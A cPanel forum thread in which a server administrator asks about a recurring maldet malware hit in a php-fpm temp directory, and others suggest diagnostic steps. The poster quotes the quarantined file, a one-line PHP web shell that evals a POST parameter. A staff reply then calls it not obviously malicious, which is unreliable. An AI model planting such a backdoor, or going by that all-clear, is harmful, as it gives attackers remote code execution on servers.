Gojko

Well-Known Member
Nov 24, 2014
112
7
68
Macedonia
cPanel Access Level
Root Administrator
I get this from maldet one in month. Any one now what is this? If is dangerous how to prevent?
I have last cPanel (no 3rd party software) and last kernel so system is updated.

FILE HIT LIST:
{HEX}php.malware.fopo.538 : /tmp/systemd-private-11cbc4cb89194d10b68f70c00007011e-ea-php56-php-fpm.service-St7D8B/tmp/phpYRhpBm => /usr/local/maldetect/quarantine/phpYRhpBm.706132374
 

24x7server

Well-Known Member
Apr 17, 2013
1,911
97
78
India
cPanel Access Level
Root Administrator
Twitter
Hi,

Check which user has uploaded this file. The user data may be infected causing this to occur..

# ls -l /tmp/systemd-private-11cbc4cb89194d10b68f70c00007011e-ea-php56-php-fpm.service-St7D8B/tmp/phpYRhpBm
OR
check the maldet session logs to check when it was quarantined and what process recalled it..
 

cPanelMichael

Administrator
Staff member
Apr 11, 2011
47,904
2,218
463
Hello,

Let us know if the previous post helps. Note that Maldet is a third-party application, so you may want to reach out to a system administrator for additional assistance if you don't receive additional user-feedback on this thread:

System Administration Services | cPanel Forums

Thank you.
 

Gojko

Well-Known Member
Nov 24, 2014
112
7
68
Macedonia
cPanel Access Level
Root Administrator
Hello, thank you for answer. Session log show only what is in report i check it with "maldet -l".
That folder don't exist because i have enabled quarantine so message is: No such file or directory.
Any other suggestions?
 

cPanelMichael

Administrator
Staff member
Apr 11, 2011
47,904
2,218
463
That folder don't exist because i have enabled quarantine
Hello,

Does the file exist in the /usr/local/maldetect/quarantine directory? If so, you could view the file to verify it's contents to see if it's legitimate. Note, if it's detecting "/usr/lib/systemd/system/ea-php56-php-fpm.service", here's how the contents of that file should look:

Code:
# cat /usr/lib/systemd/system/ea-php56-php-fpm.service
[Unit]
Description=The PHP FastCGI Process Manager
After=syslog.target network.target network-online.target

[Service]
Type=notify
PIDFile=/opt/cpanel/ea-php56/root/usr/var/run/php-fpm/php-fpm.pid
EnvironmentFile=/opt/cpanel/ea-php56/root/etc/sysconfig/php-fpm
ExecStart=/opt/cpanel/ea-php56/root/usr/sbin/php-fpm --nodaemonize
ExecReload=/bin/kill -USR2 $MAINPID
PrivateTmp=true

[Install]
WantedBy=multi-user.target
Thank you.
 

Gojko

Well-Known Member
Nov 24, 2014
112
7
68
Macedonia
cPanel Access Level
Root Administrator
Actually no, in quarantine there is no file/folders like that. I will check next time (because it happens couple times in month) directly in quarantine and update this threads.
 

Gojko

Well-Known Member
Nov 24, 2014
112
7
68
Macedonia
cPanel Access Level
Root Administrator
Hello. content of one of them is:
Code:
8D9AAC4D8E44392996B8CDF782<?php  @eval($_POST['xbcmd']); die();?>
second:

Code:
# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
CPANELACCOUNT:CPANELACCOUNT:600:71:0e95b1762b4f353bec9209d75350:1523196703:1523196508:1523196508:/tmp/systemd-private-21c4a2923244dbbd6c0543722c8f4-ea-php56-php-fpm.service-SBugLp/tmp/phpZRL1RW
maldet:
Code:
maldet(20913): {scan} scan completed on /home/CPANELACCOUNT: files 3076, malware hits 0, cleaned hits 0, time 44s

Code:
cat /usr/lib/systemd/system/ea-php56-php-fpm.service
[Unit]
Description=The PHP FastCGI Process Manager
After=syslog.target network.target network-online.target securetmp.service

[Service]
Type=notify
PIDFile=/opt/cpanel/ea-php56/root/usr/var/run/php-fpm/php-fpm.pid
EnvironmentFile=/opt/cpanel/ea-php56/root/etc/sysconfig/php-fpm
ExecStart=/opt/cpanel/ea-php56/root/usr/sbin/php-fpm --nodaemonize
ExecReload=/bin/kill -USR2 $MAINPID
PrivateTmp=true
LimitNOFILE=infinity

[Install]
WantedBy=multi-user.target
 
Last edited by a moderator:

cPanelMichael

Administrator
Staff member
Apr 11, 2011
47,904
2,218
463
Hello,

The contents of the /usr/lib/systemd/system/ea-php56-php-fpm.service file that you provided match what I see on a test system. However, I believe you are referring to the contents of the PHP file in the /tmp directory. I don't see any obvious signs of malicious intent based on the information you provided, but you may want to reach out to a system administrator for additional assistance if want a more in-depth investigation:

System Administration Services | cPanel Forums

Thank you.